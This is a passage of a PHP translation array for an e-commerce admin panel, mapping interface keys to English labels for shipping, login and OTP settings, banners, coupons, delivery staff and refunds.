_the_shipping_charge_will_increase_with_the_product_quantity' => 'If enabled the shipping charge will increase with the product quantity', 'add_your_product’s_thumbnail_in' => 'Add your product’s thumbnail in', 'format_within' => 'Format within', 'upload_any_additional_images_for_this_product_from_here' => 'Upload any additional images for this product from here', 'add_color-wise_product_images_here' => 'Add color-wise product images here', 'add_the_YouTube_video_link_here._Only_the_YouTube-embedded_link_is_supported' => 'Add the YouTube video link here. Only the YouTube-embedded link is supported', 'add_Meta_Image_in' => 'Add Meta Image in', 'which_will_be_shown_in_search_engine_results' => 'Which will be shown in search engine results', 'this_shop_currently_close_now' => 'This shop currently close now', 'seller_pos_permission_updated.' => 'Seller pos permission updated.', 'for_“Ready_Product”_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products_by_seller._For_“Ready_After_Sale”_deliveries _customers_pay_first _then_seller_uploads_the_digital_products_that_become_available_to_customers_for_download' => 'For “Ready Product” deliveries customers can pay & instantly download pre-uploaded digital products by seller. For “Ready After Sale” deliveries customers pay first then seller uploads the digital products that become available to customers for download', 'update_&_Publish' => 'Update & Publish', 'customer Name' => 'Customer Name', 'must_upload_colour_wise_images_first._Colour_is_shown_in_the_image_section_top_right' => 'Must upload colour wise images first. Colour is shown in the image section top right', 'delivery_fee' => 'Delivery fee', 'add_more_for_free_delivery' => 'Add more for free delivery', 'Choose_Logo' => 'Choose Logo', 'turn' => 'Turn', 'important' => 'Important', 'reCAPTCHA_is_now_enabled_for_added_security.Users_may_be_prompted_to_complete_a_reCAPTCHA_challenge_to_verify_their_human_identity_and protect_against_spam_and_malicious_activity' => 'ReCAPTCHA is now enabled for added security.Users may be prompted to complete a reCAPTCHA challenge to verify their human identity and protect against spam and malicious activity', 'add_a_label_(Ex:_abc_company)' => 'Add a label (Ex: abc company)', 'want_to_change_the_shipping_responsibility_to_Seller_Wise' => 'Want to change the shipping responsibility to Seller Wise', 'want_to_change_the_shipping_responsibility_to_Inhouse' => 'Want to change the shipping responsibility to Inhouse', 'admin_will_handle_the_shipping_responsibilities_when_you_choose_inhouse_shipping_method' => 'Admin will handle the shipping responsibilities when you choose inhouse shipping method', 'Want_to_change_the_shipping_responsibility_to_Inhouse' => 'Want to change the shipping responsibility to Inhouse', 'sellers_will_handle_the_shipping_responsibilities_when_you_choose_seller_wise_shipping_method' => 'Sellers will handle the shipping responsibilities when you choose seller wise shipping method', 'please_make_sure_all_the product`s_delivery_charges_are_up_to_date.' => 'Please make sure all the product`s delivery charges are up to date.', 'category_wise_shipping_cost' => 'Category wise shipping cost', 'ticket_closed_successfully.' => 'Ticket closed successfully.', 'deleted!' => 'Deleted!', 'cancelled' => 'Cancelled', 'you_do_not_have_sufficient_balance_for_pay_this_order!!' => 'You do not have sufficient balance for pay this order!!', 'Deluxe Online Deluxe' => 'Deluxe Online Deluxe', 'deliveryman_review' => 'Deliveryman review', 'order wise shipping cost' => 'Order wise shipping cost', 'admin_Earning_Report' => 'Admin Earning Report', 'in_House_earning' => 'In House earning', 'earning_From_Shipping' => 'Earning From Shipping', 'total_Tax' => 'Total Tax', 'filter_order' => 'Filter order', 'order_type' => 'Order type', 'date_type' => 'Date type', 'order_Transaction_Statement' => 'Order Transaction Statement', 'delivered_By' => 'Delivered By', 'total_Product_Amount' => 'Total Product Amount', 'discounted_Amount' => 'Discounted Amount', 'delivery_Charge' => 'Delivery Charge', 'order_Amount' => 'Order Amount', 'profile_Settings' => 'Profile Settings', 'nav_menu' => 'Nav menu', 'basic_Information' => 'Basic Information', 'full_name' => 'Full name', 'display_name' => 'Display name', 'your_first_name' => 'Your first name', 'enter_new_email_address' => 'Enter new email address', 'profile_Image' => 'Profile Image', 'image_Upload' => 'Image Upload', 'change_your_password' => 'Change your password', 'enter_new_password' => 'Enter new password', 'confirm_your_new_password' => 'Confirm your new password', 'Delivery_unavailable_for_this_zip_code_area' => 'Delivery unavailable for this zip code area', 'update_successful' => 'Update successful', 'sslcommerz' => 'Sslcommerz', 'want_to_Turn_ON_the_smtp_mail_configt_option' => 'Want to Turn ON the smtp mail configt option', 'want_to_Turn_OFF_the_smtp_mail_config_option' => 'Want to Turn OFF the smtp mail config option', 'enabling_mail_configuration_services_will_allow_the_system_to_send_emails.Please_ensure_that_you_have_correctly_configured_the_SMTP_settings_to_avoid_potential_issues_with_email_delivery' => 'Enabling mail configuration services will allow the system to send emails.Please ensure that you have correctly configured the SMTP settings to avoid potential issues with email delivery', 'disabling_SMTP_mail_configuration_services_stops_email_sending' => 'Disabling SMTP mail configuration services stops email sending', 'want_to_Turn_ON_the_sendgrid_mail_configt_option' => 'Want to Turn ON the sendgrid mail configt option', 'want_to_Turn_OFF_the_sendgrid_mail_config_option' => 'Want to Turn OFF the sendgrid mail config option', 'enabling_mail_configuration_services_will_allow_the_system_to_send_emails.Please_ensure_that_you_have_correctly_configured_the_sendgrid_settings_to_avoid_potential_issues_with_email_delivery' => 'Enabling mail configuration services will allow the system to send emails.Please ensure that you have correctly configured the sendgrid settings to avoid potential issues with email delivery', 'disabling_sendgrid_mail_configuration_services_stops_email_sending' => 'Disabling sendgrid mail configuration services stops email sending', 'Deluxe Online Deluxe Online' => 'Deluxe Online Deluxe Online', 'No_Order_Found' => 'No Order Found', 'Want_to_Turn_ON_Coupon_Status' => 'Want to Turn ON Coupon Status', 'Want_to_Turn_OFF_Coupon_Status' => 'Want to Turn OFF Coupon Status', 'if_enabled_this_coupon_will_be_available_on_the_website_and_customer_app' => 'If enabled this coupon will be available on the website and customer app', 'if_disabled_this_coupon_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this coupon will be hidden from the website and customer app', 'for_“Ready_Product”_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products._For_“Ready_After_Sale”_deliveries _customers_pay_first _then_admin_uploads_the_digital_products_that_become_available_to_customers_for_download' => 'For “Ready Product” deliveries customers can pay & instantly download pre-uploaded digital products. For “Ready After Sale” deliveries customers pay first then admin uploads the digital products that become available to customers for download', 'add_the_product_search_tag_for_this_product_that_customers_can_use_to_search_quickly' => 'Add the product search tag for this product that customers can use to search quickly', 'pricing_&_others' => 'Pricing & others', 'set_the_tax_calculation_method_from_here._Select_“Include_with_product”_to_combine_product_price_and_tax_on_the_checkout._Pick_“Exclude_from_product”_to_display_product_price_and_tax_amount_separately.' => 'Set the tax calculation method from here. Select “Include with product” to combine product price and tax on the checkout. Pick “Exclude from product” to display product price and tax amount separately.', 'set_the_shipping_cost_for_this_product_here._Shipping_cost_will_only_be_applicable_if_product-wise_shipping_is_enabled.' => 'Set the shipping cost for this product here. Shipping cost will only be applicable if product-wise shipping is enabled.', 'Want_to_Add' => 'Want to Add', 'to_the_featured_section' => 'To the featured section', 'Want_to_Remove' => 'Want to Remove', 'if_enabled_this_product_will_be_shown_in_the_featured_product_on_the_website_and_customer_app' => 'If enabled this product will be shown in the featured product on the website and customer app', 'if_disabled_this_product_will_be_removed_from_the_featured_product_section_of_the_website_and_customer_app' => 'If disabled this product will be removed from the featured product section of the website and customer app', 'Want_to_Turn_ON' => 'Want to Turn ON', 'Want_to_Turn_OFF' => 'Want to Turn OFF', 'if_enabled_this_product_will_be_available_on_the_website_and_customer_app' => 'If enabled this product will be available on the website and customer app', 'if_disabled_this_product_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this product will be hidden from the website and customer app', 'London Beauty Soap Bar' => 'London Beauty Soap Bar', 'all_store' => 'All store', 'no_country_to_deliver' => 'No country to deliver', 'Want_to_Turn_ON_Offline_Payment_Methods' => 'Want to Turn ON Offline Payment Methods', 'Want_to_Turn_OFF_Offline_Payment_Methods' => 'Want to Turn OFF Offline Payment Methods', 'if_enabled_customers_can_pay_through_different_payment_methods_outside_your_system' => 'If enabled customers can pay through different payment methods outside your system', 'if_disabled_customers_can_only_pay_through_the_system_supported_payment_methods' => 'If disabled customers can only pay through the system supported payment methods', 'if_Customer_Referral_Earning_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'If Customer Referral Earning is disabled above all settings of this section will be unavailable', 'set_the_earning_amount_for_each_successful_referral' => 'Set the earning amount for each successful referral', 'if_enabled_admin_can_deliver_orders_outside_his_country' => 'If enabled admin can deliver orders outside his country', 'want_to_Turn_ON_Delivery_Available_Country' => 'Want to Turn ON Delivery Available Country', 'want_to_Turn_OFF_Delivery_Available_Country' => 'Want to Turn OFF Delivery Available Country', 'If_enabled_admin_can_deliver_orders_beyond_his_country' => 'If enabled admin can deliver orders beyond his country', 'If_disabled_admin_can_deliver_orders_only_within_his_country' => 'If disabled admin can deliver orders only within his country', 'if_enabled_deliveries_will_be_available_only_in_the_added_zip_code_areas' => 'If enabled deliveries will be available only in the added zip code areas', 'want_to_Turn_ON_Delivery_Available_Zip_Code_Area' => 'Want to Turn ON Delivery Available Zip Code Area', 'want_to_Turn_OFF_Delivery_Available_Zip_Code_Area' => 'Want to Turn OFF Delivery Available Zip Code Area', 'if_disabled_there_will_be_no_delivery_restrictions_based_on_zip_code_areas' => 'If disabled there will be no delivery restrictions based on zip code areas', 'no_country_found' => 'No country found', 'no_zip_code_found' => 'No zip code found', 'please_enter_zip_code' => 'Please enter zip code', 'new product' => 'New product', 'test product minus value' => 'Test product minus value', 'copy_the_latitude_of_your_business_location_from_Google_Maps_and_paste_it_here' => 'Copy the latitude of your business location from Google Maps and paste it here', 'copy_the_longitude_of_your_business_location_from_Google_Maps_and_paste_it_here' => 'Copy the longitude of your business location from Google Maps and paste it here', 'Theme Changed to Default' => 'Theme Changed to Default', 'urway' => 'Urway', 'order_verification_images' => 'Order verification images', 'name_not_found' => 'Name not found', 'phone_not_found' => 'Phone not found', 'type something!' => 'Type something!', 'order_Info' => 'Order Info', 'offline_payments_info' => 'Offline payments info', 'view_order_details' => 'View order details', 'minimum_order_quantity_cannot_be_less_than' => 'Minimum order quantity cannot be less than', 'banner_Setup' => 'Banner Setup', 'banner_image_ratio_is_not_same_for_all_sections_in_website' => 'Banner image ratio is not same for all sections in website', 'please_review_the_ratio_before_upload' => 'Please review the ratio before upload', 'banner_Image_ratio_is_not_same_for_all_sections_in_website' => 'Banner Image ratio is not same for all sections in website', 'if_enabled_this_banner_will_be_available_on_the_website_and_customer_app' => 'If enabled this banner will be available on the website and customer app', 'if_disabled_this_banner_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this banner will be hidden from the website and customer app', 'Promo Banner Right' => 'Promo Banner Right', 'Promo Banner Middle Bottom' => 'Promo Banner Middle Bottom', 'Promo Banner Middle Top' => 'Promo Banner Middle Top', 'Promo Banner Left' => 'Promo Banner Left', 'all_Pages_Banner ' => 'All Pages Banner ', 'Banner Privacy Policy' => 'Banner Privacy Policy', 'banner privacy policy' => 'Banner privacy policy', 'Banner Refund Policy' => 'Banner Refund Policy', 'banner refund policy' => 'Banner refund policy', 'Banner Return Policy' => 'Banner Return Policy', 'banner return policy' => 'Banner return policy', 'banner cancellation policy' => 'Banner cancellation policy', 'Banner Product List Page' => 'Banner Product List Page', 'banner product list page' => 'Banner product list page', 'banner terms conditions' => 'Banner terms conditions', 'Banner Faq Page' => 'Banner Faq Page', 'banner faq page' => 'Banner faq page', 'Banner About Us' => 'Banner About Us', 'banner about us' => 'Banner about us', 'please_fill_out_this_field' => 'Please fill out this field', 'want_to_inactive_this' => 'Want to inactive this', 'are_you_sure_you_want_to_delete_the' => 'Are you sure you want to delete the', 'you_will_lost_the_this' => 'You will lost the this', 'want_to_activate_this' => 'Want to activate this', 'OTP_&_login_settings' => 'OTP & login settings', 'maximum_OTP_hit' => 'Maximum OTP hit', 'set_how_many_times_a_user_can_hit_the_wrong_OTPs.' => 'Set how many times a user can hit the wrong OTPs.', 'after_reaching_this_limit_the_user_will_be_blocked_for_a_time' => 'After reaching this limit the user will be blocked for a time', 'OTP_resend_time_' => 'OTP resend time ', '(sec)' => '(sec)', 'set_the_time_for_requesting_a_new_OTP' => 'Set the time for requesting a new OTP', 'ex: 30 ' => 'Ex: 30 ', 'Within_this_time_users_can_not_make_OTP_requests_again' => 'Within this time users can not make OTP requests again', 'ex: 120' => 'Ex: 120', 'set_the_maximum_unsuccessful_login_attempts_users_can_make_using_wrong_passwords.' => 'Set the maximum unsuccessful login attempts users can make using wrong passwords.', 'after_reaching_this_limit_they_will_be_blocked_for_a_time' => 'After reaching this limit they will be blocked for a time', 'set_a_time_duration_during_which_users_cannot_log_in_after_reaching_the_Maximum_Login_Hit_limit' => 'Set a time duration during which users cannot log in after reaching the Maximum Login Hit limit', 'ex: 1210' => 'Ex: 1210', 'want_to_turn_ON_google_login' => 'Want to turn ON google login', 'want_to_turn_OFF_google_login' => 'Want to turn OFF google login', 'if_enabled_customers_can_log_in_to_their_account_using_their google credentials' => 'If enabled customers can log in to their account using their google credentials', 'if_disabled_customers_cannot_log_in_to_their_account_using_their google credentials' => 'If disabled customers cannot log in to their account using their google credentials', 'add_the_OAuth_authorization_URL' => 'Add the OAuth authorization URL', 'add_the_unique_client_ID ' => 'Add the unique client ID ', 'client_secret_key' => 'Client secret key', 'want_to_turn_ON_facebook_login' => 'Want to turn ON facebook login', 'want_to_turn_OFF_facebook_login' => 'Want to turn OFF facebook login', 'if_enabled_customers_can_log_in_to_their_account_using_their facebook credentials' => 'If enabled customers can log in to their account using their facebook credentials', 'if_disabled_customers_cannot_log_in_to_their_account_using_their facebook credentials' => 'If disabled customers cannot log in to their account using their facebook credentials', 'want_to_turn_ON_apple_login' => 'Want to turn ON apple login', 'want_to_turn_OFF_apple_login' => 'Want to turn OFF apple login', 'if_enabled_customers_can_log_in_to_their_account_using_their_Apple_credentials' => 'If enabled customers can log in to their account using their Apple credentials', 'if_disabled_customers_cannot_log_in_to_their_account_using_their_Apple_credentials' => 'If disabled customers cannot log in to their account using their Apple credentials', 'add_the_unique_client_ID' => 'Add the unique client ID', 'add_key_id' => 'Add key id', 'key_ID' => 'Key ID', 'go_to_the_Google_Developers_Console' => 'Go to the Google Developers Console', 'create_a_new_project_or_select_an_existing_project' => 'Create a new project or select an existing project', 'click_on_ Credentials _in_the_left-hand_menu' => 'Click on Credentials in the left-hand menu', 'create_an_OAuth_client_ID_for_a_web_application' => 'Create an OAuth client ID for a web application', 'enter_a_name_for_your_client ID_and_click_ Create ' => 'Enter a name for your client ID and click Create ', 'enter_the_URL_of_your_website_as_an_authorized_JavaScript_origin' => 'Enter the URL of your website as an authorized JavaScript origin', 'enter_the_callback_URL_as_an_authorized_redirect_URL' => 'Enter the callback URL as an authorized redirect URL', 'copy_and_paste_the_client_ID_and_client_secret_into_your_application`s_settings' => 'Copy and paste the client ID and client secret into your application`s settings', 'enable_the_Google_login_option_in_your_application`s_settings_and_thoroughly_test_the_integration_before_deploying_it_to_a_live_environment' => 'Enable the Google login option in your application`s settings and thoroughly test the integration before deploying it to a live environment', 'go_to_the_Facebook_Developer_website' => 'Go to the Facebook Developer website', 'create_a_new_app_or_select_an_existing_app' => 'Create a new app or select an existing app', 'click_on_ Add_a_New_App _or_select_an_existing_app_from_the_dashboard' => 'Click on Add a New App or select an existing app from the dashboard', 'fill_in_the_required_details _such_as_Display_Name _Contact_Email _and_App_Purpose' => 'Fill in the required details such as Display Name Contact Email and App Purpose', 'click_ Create_App _to_create_your_app' => 'Click Create App to create your app', 'in_the_left-hand_menu _click_on Settings _and_then_ Basic _to access_your_app`s_basic_settings' => 'In the left-hand menu click on Settings and then Basic to access your app`s basic settings', 'scroll_down_to_the_ Facebook_Login _section_and_click_on_ Set_Up _to_configure_your_Facebook_login_settings' => 'Scroll down to the Facebook Login section and click on Set Up to configure your Facebook login settings', 'choose_the_login_behavior _permissions _and_other_settings_as_per_your_requirements' => 'Choose the login behavior permissions and other settings as per your requirements', 'copy_and_paste_the_App_ID_and_App_Secret_into_your_application`s_settings' => 'Copy and paste the App ID and App Secret into your application`s settings', 'enable_the_Facebook_login_option_in_your_application`s_settings_and_thoroughly_test_the_integration_before_deploying_it_to_a_live_environment' => 'Enable the Facebook login option in your application`s settings and thoroughly test the integration before deploying it to a live environment', 'apple_API_Set_up_Instructions' => 'Apple API Set up Instructions', 'order_Note' => 'Order Note', 'product_ID_is_required' => 'Product ID is required', 'cart_key_or_ID_is_required' => 'Cart key or ID is required', 'order_not_found' => 'Order not found', 'invalid_coupon' => 'Invalid coupon', 'Delivery_man_added_successfully' => 'Delivery man added successfully', 'Want_to_Turn_ON_Deliveryman_Status' => 'Want to Turn ON Deliveryman Status', 'Want_to_Turn_OFF_Deliveryman_Status' => 'Want to Turn OFF Deliveryman Status', 'if_enabled_this_deliveryman_can_log_in_to_the_system_and_deliver_products' => 'If enabled this deliveryman can log in to the system and deliver products', 'if_disabled_this_deliveryman_cannot_log_in_to_the_system_and_deliver_any_products' => 'If disabled this deliveryman cannot log in to the system and deliver any products', 'want_to_remove_this_information ' => 'Want to remove this information ', 'finish' => 'Finish', 'identity_type' => 'Identity type', 'driving_license' => 'Driving license', 'company_id' => 'Company id', 'identity_number' => 'Identity number', 'add_deliveryman' => 'Add deliveryman', 'no_delivery_man_found' => 'No delivery man found', 'multiply_with_quantity' => 'Multiply with quantity', 'This_phone_number_is_already_taken' => 'This phone number is already taken', 'Coupon_deleted_successfully' => 'Coupon deleted successfully', 'Want_to_Unlock' => 'Want to Unlock', 'Want_to_Block' => 'Want to Block', 'if_enabled_this_customer_will_be_unblocked_and_can_log_in_to_this_system_again' => 'If enabled this customer will be unblocked and can log in to this system again', 'if_disabled_this_customer_will_be_blocked_and_cannot_log_in_to_this_system' => 'If disabled this customer will be blocked and cannot log in to this system', 'the_minimum_purchase_amount_must_be_greater_than_discount_amount' => 'The minimum purchase amount must be greater than discount amount', 'total_sold_amount' => 'Total sold amount', 'additional_Information' => 'Additional Information', 'filter_Products' => 'Filter Products', 'product_SKU' => 'Product SKU', 'attribute_Variation' => 'Attribute Variation', 'variation_Wise_Price' => 'Variation Wise Price', 'Variation_Wise_Stock' => 'Variation Wise Stock', 'Upload_Image' => 'Upload Image', 'you_can`t_delete_account_due_ongoing_product' => 'You can`t delete account due ongoing product', 'give_review' => 'Give review', 'search menu' => 'Search menu', 'category_not_found' => 'Category not found', 'Want_to_Turn_ON_Deal_of_the_Day_Status' => 'Want to Turn ON Deal of the Day Status', 'Want_to_Turn_OFF_Deal_of_the_Day_Status' => 'Want to Turn OFF Deal of the Day Status', 'if_enabled_this_deal_of_the_day_will_be_available_on_the_website_and_customer_app' => 'If enabled this deal of the day will be available on the website and customer app', 'if_disabled_this_deal_of_the_day_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this deal of the day will be hidden from the website and customer app', 'deal_Update' => 'Deal Update', 'update_Deal_of_The_Day' => 'Update Deal of The Day', 'Want_to_Turn_ON_Flash_Deal_Status' => 'Want to Turn ON Flash Deal Status', 'Want_to_Turn_OFF_Flash_Deal_Status' => 'Want to Turn OFF Flash Deal Status', 'if_enabled_this_flash_sale_will_be_available_on_the_website_and_customer_app' => 'If enabled this flash sale will be available on the website and customer app', 'if_disabled_this_flash_sale_will_be_hidden_from_the_user_website_and_customer_app' => 'If disabled this flash sale will be hidden from the user website and customer app', 'contact_View' => 'Contact View', 'message_view' => 'Message view', 'user_details' => 'User details', 'feedback' => 'Feedback', 'please_send_a_Feedback' => 'Please send a Feedback', 'not_Seen_Yet' => 'Not Seen Yet', 'message_Log' => 'Message Log', 'foyixyitd' => 'Foyixyitd', 'no_reply' => 'No reply', 'send_Mail' => 'Send Mail', 'configure_your_mail_setup_first' => 'Configure your mail setup first', 'mail_Body' => 'Mail Body', 'new_Request' => 'New Request', 'POS_Order' => 'POS Order', 'add_meta_titles_descriptions_and_images_for_products' => 'Add meta titles descriptions and images for products', 'this_will_help_more_people_to_find_them_on_search_engines_and_see_the_right_details_while_sharing_on_other_social_platforms' => 'This will help more people to find them on search engines and see the right details while sharing on other social platforms', 'add_the_products_title_name_taglines_etc_here' => 'Add the products title name taglines etc here', 'this_title_will_be_seen_on_Search_Engine_Results_Pages_and_while_sharing_the_products_link_on_social_platforms' => 'This title will be seen on Search Engine Results Pages and while sharing the products link on social platforms', 'character_Limit' => 'Character Limit', 'write_a_short_description_of_the_InHouse_shops_product' => 'Write a short description of the InHouse shops product', 'this_description_will_be_seen_on_Search_Engine_Results_Pages_and_while_sharing_the_products_link_on_social_platforms' => 'This description will be seen on Search Engine Results Pages and while sharing the products link on social platforms', 'Notification_Sent_to_All_Sellers_Fail' => 'Notification Sent to All Sellers Fail', 'Notification_Sent_to_All_Sellers' => 'Notification Sent to All Sellers', 'Amazon Pro' => 'Amazon Pro', 'Want_to_enable_the_Temporary_Close' => 'Want to enable the Temporary Close', 'Want_to_disable_the_Temporary_Close' => 'Want to disable the Temporary Close', 'if_enabled_your_shop_and_products_will_be_temporarily_closed' => 'If enabled your shop and products will be temporarily closed', 'if_disabled_your_shop_and_products_will_be_active' => 'If disabled your shop and products will be active', 'set_the_minimum_order_amount_a_customer_must_order_from_this_seller_shop' => 'Set the minimum order amount a customer must order from this seller shop', 'OTP_sent_successfully._Please_check_your_email_or_phone' => 'OTP sent successfully. Please check your email or phone', 'Deliveryman_Password_Reset_Mail' => 'Deliveryman Password Reset Mail', 'OTP for Reset Password' => 'OTP for Reset Password', 'user_not_found' => 'User not found', 'want_to_Turn_ON_This_Withdraw_Method' => 'Want to Turn ON This Withdraw Method', 'want_to_Turn_OFF_This_Withdraw_Method' => 'Want to Turn OFF This Withdraw Method', 'if_you_enable_this_Withdraw_method_will_be_shown_in_the_seller_app_and_seller_panel' => 'If you enable this Withdraw method will be shown in the seller app and seller panel', 'if_you_disable_this_Withdraw_method_will_not_be_shown_in_the_seller_app_and_seller_panel' => 'If you disable this Withdraw method will not be shown in the seller app and seller panel', 'if_you_enable_this_Withdraw_method_will_be_set_as_Default_Withdraw_Method_in_the_seller_app_and_seller_panel' => 'If you enable this Withdraw method will be set as Default Withdraw Method in the seller app and seller panel', 'if_you_disable_this_Withdraw_method_will_be_remove_as_Default_Withdraw_Method_in_the_seller_app_and_seller_panel' => 'If you disable this Withdraw method will be remove as Default Withdraw Method in the seller app and seller panel', 'Seller_POS_Permission' => 'Seller POS Permission', 'if_enabled_this_seller_can_access_POS_from_the_website_and_seller_app' => 'If enabled this seller can access POS from the website and seller app', 'want_to_Turn_ON_POS_For_This_Seller' => 'Want to Turn ON POS For This Seller', 'want_to_Turn_OFF_POS_For_This_Seller' => 'Want to Turn OFF POS For This Seller', 'if_disabled_this_seller_can_access_POS_from_the_website_and_seller_app' => 'If disabled this seller can access POS from the website and seller app', 'want_to_Turn_ON_Sales_Commission_For_This_Seller' => 'Want to Turn ON Sales Commission For This Seller', 'want_to_Turn_OFF_Sales_Commission_For_This_Seller' => 'Want to Turn OFF Sales Commission For This Seller', 'if_sales_commission_is_enabled_here_the_this_commission_will_be_applied' => 'If sales commission is enabled here the this commission will be applied', 'want_to_Turn_ON_GST_Number_For_This_Seller' => 'Want to Turn ON GST Number For This Seller', 'want_to_Turn_OFF_GST_Number_For_This_Seller' => 'Want to Turn OFF GST Number For This Seller', 'if_GST_number_is_enabled_here_it_will_be_show_in_invoice' => 'If GST number is enabled here it will be show in invoice', 'commission_percentage_for_this_seller_has_been_updated.' => 'Commission percentage for this seller has been updated.', 'GST_number_for_this_seller_has_been_updated.' => 'GST number for this seller has been updated.', 'Secure_Payment' => 'Secure Payment', 'see_less' => 'See less', 'Customers_will_not_be_able_to_select_COD_as_a_payment_method_during_checkout' => 'Customers will not be able to select COD as a payment method during checkout', 'please_review_your_settings_and_enable_COD_if_you_wish_to_offer_this_payment_option_to_customers' => 'Please review your settings and enable COD if you wish to offer this payment option to customers', 'dont_miss_todays_deal' => 'Dont miss todays deal', 'shop_unfollow' => 'Shop unfollow', 'Features_Section' => 'Features Section', 'view_All_Hold_Orders' => 'View All Hold Orders', 'add_New_Customer' => 'Add New Customer', 'clear_Cart' => 'Clear Cart', 'new_Order' => 'New Order', 'announcement_Setup' => 'Announcement Setup', 'Want_to_Turn_ON_Language_Status' => 'Want to Turn ON Language Status', 'Want_to_Turn_OFF_Language_Status' => 'Want to Turn OFF Language Status', 'if_enabled_this_language_will_be_available_throughout_the_entire_system' => 'If enabled this language will be available throughout the entire system', 'if_disabled_this_language_will_be_hidden_from_the_entire_system' => 'If disabled this language will be hidden from the entire system', 'Want_to_Change_Default_Language_Status' => 'Want to Change Default Language Status', 'if_enabled_this_language_will_be_set_as_default_for_the_entire_system' => 'If enabled this language will be set as default for the entire system', 'if_disabled_this_language_will_be_unset_as_default_for_the_entire_system' => 'If disabled this language will be unset as default for the entire system', 'default_language_can_not_be_deactive' => 'Default language can not be deactive', 'Showing' => 'Showing', 'Of' => 'Of', 'Entries' => 'Entries', 'Filtered' => 'Filtered', 'Total_entries' => 'Total entries', 'No_data_found' => 'No data found', 'No_matching_data_found' => 'No matching data found', 'inhouse_Requests' => 'Inhouse Requests', 'seller_Requests' => 'Seller Requests', 'after_refunded_you_can_not_change_it' => 'After refunded you can not change it', 'you_want_to_change_refund_status' => 'You want to change refund status', 'refund_status_updated_successfully' => 'Refund status updated successfully', 'it_is_already_refunded_you_can_not_change_it' => 'It is already refunded you can not change it', 'website_Order' => 'Website Order', 'out city' => 'Out city', 'terms_&_Conditions' => 'Terms & Conditions', 'privacy_Policy' => 'Privacy Policy', 'refund_Policy' => 'Refund Policy', 'return_Policy' => 'Return Policy', 'cancellation_Policy' => 'Cancellation Policy', 'about_Us' => 'About Us', 'help_topic_Table' => 'Help topic Table', 'add_FAQ' => 'Add FAQ', 'question' => 'Question', 'answer' => 'Answer', 'ranking' => 'Ranking', 'add_Help_Topic' => 'Add Help Topic', 'type_Question' => 'Type Question', 'type_Answer' => 'Type Answer', 'edit_Modal_Help_Topic' => 'Edit Modal Help Topic', 'are_you_sure_delete_this_FAQ' => 'Are you sure delete this FAQ', 'FAQ_deleted_successfully' => 'FAQ deleted successfully', 'want_to_Turn_ON_This_Shipping_Method' => 'Want to Turn ON This Shipping Method', 'want_to_Turn_OFF_This_Shipping_Method' => 'Want to Turn OFF This Shipping Method', 'if_you_enable_this_shipping_method_will_be_shown_in_the_user_app_and_website_for_customer_checkout' => 'If you enable this shipping method will be shown in the user app and website for customer checkout', 'if_you_disable_this_shipping_method_will_not_be_shown_in_the_user_app_and_website_for_customer_checkout' => 'If you disable this shipping method will not be shown in the user app and website for customer checkout', 'want_to_Turn_ON_This_FAQ' => 'Want to Turn ON This FAQ', 'want_to_Turn_OFF_This_FAQ' => 'Want to Turn OFF This FAQ', 'if_you_enable_this_FAQ_will_be_shown_in_the_user_app_and_website' => 'If you enable this FAQ will be shown in the user app and website', 'if_you_disable_this_FAQ_will_not_be_shown_in_the_user_app_and_website' => 'If you disable this FAQ will not be shown in the user app and website', 'for_“Ready_Product”_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products._For_“Ready_After_Sale”_deliveries _customers_pay_first _then_seller_uploads_the_digital_products_that_become_available_to_customers_for_download' => 'For “Ready Product” deliveries customers can pay & instantly download pre-uploaded digital products. For “Ready After Sale” deliveries customers pay first then seller uploads the digital products that become available to customers for download', 'add_your_products_thumbnail_in' => 'Add your products thumbnail in', 'without_configuring_this_section_map_functionality_will_not_work_properly' => 'Without configuring this section map functionality will not work properly', 'thus_the_whole_system_will_not_work_as_it_planned' => 'Thus the whole system will not work as it planned', 'client_key_should_have_enable_map_javascript_api_and_you_can_restrict_it_with_http_refere' => 'Client key should have enable map javascript api and you can restrict it with http refere', 'server_key_should_have_enable_place_api_key_and_you_can_restrict_it_with_ip' => 'Server key should have enable place api key and you can restrict it with ip', 'you_can_use_same_api_for_both_field_without_any_restrictions' => 'You can use same api for both field without any restrictions', 'your_order_is_being_processed_and_will_be_completed_within_3_to_6_hours' => 'Your order is being processed and will be completed within 3 to 6 hours', 'contact_your_email_service_provider_or_IT_administrator_to_obtain_the_SMTP_server_details_such_as_hostname_port_username_and_password' => 'Contact your email service provider or IT administrator to obtain the SMTP server details such as hostname port username and password', 'products_Stock' => 'Products Stock', 'shop_not_found' => 'Shop not found', 'if_enabled_this_icon_will_be_available_on_the_website_and_customer_app' => 'If enabled this icon will be available on the website and customer app', 'if_disabled_this_icon_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this icon will be hidden from the website and customer app', 'google-plus' => 'Google-plus', 'linkedin' => 'Linkedin', 'this_page_contains_sensitive_information.Make_sure_before_changing.' => 'This page contains sensitive information.Make sure before changing.', 'addon settings' => 'Addon settings', 'add fund bonus categ...' => 'Add fund bonus categ...', 'digital product otp ...' => 'Digital product otp ...', 'guest users' => 'Guest users', 'most demandeds' => 'Most demandeds', 'notification seens' => 'Notification seens', 'offline payments' => 'Offline payments', 'offline payment meth...' => 'Offline payment meth...', 'order delivery verif...' => 'Order delivery verif...', 'payment requests' => 'Payment requests', 'sensitive_data' => 'Sensitive data', 'make_sure_before_changing.' => 'Make sure before changing.', 'No_Table_Updated' => 'No Table Updated', 'update_delivery_man' => 'Update delivery man', 'update_Deliveryman' => 'Update Deliveryman', 'new_delivery_man' => 'New delivery man', 'withdraw_information_view' => 'Withdraw information view', 'delivery_Man_Withdraw_Information' => 'Delivery Man Withdraw Information', 'withdraw_request_process' => 'Withdraw request process', 'approve' => 'Approve', 'note_about_transaction_or_request' => 'Note about transaction or request', 'upload_File' => 'Upload File', 'choose_Images' => 'Choose Images', 'file_path_copied_successfully' => 'File path copied successfully', 'shop_cover_image' => 'Shop cover image', 'secondary_banner' => 'Secondary banner', 'secondary' => 'Secondary', 'order_status_updated_successfully' => 'Order status updated successfully', 'Want_to_Turn_ON_Push_Notification' => 'Want to Turn ON Push Notification', 'Want_to_Turn_OFF_Push_Notification' => 'Want to Turn OFF Push Notification', 'if_enabled_customers_and_seller_will_receive_notifications_on_their_devices' => 'If 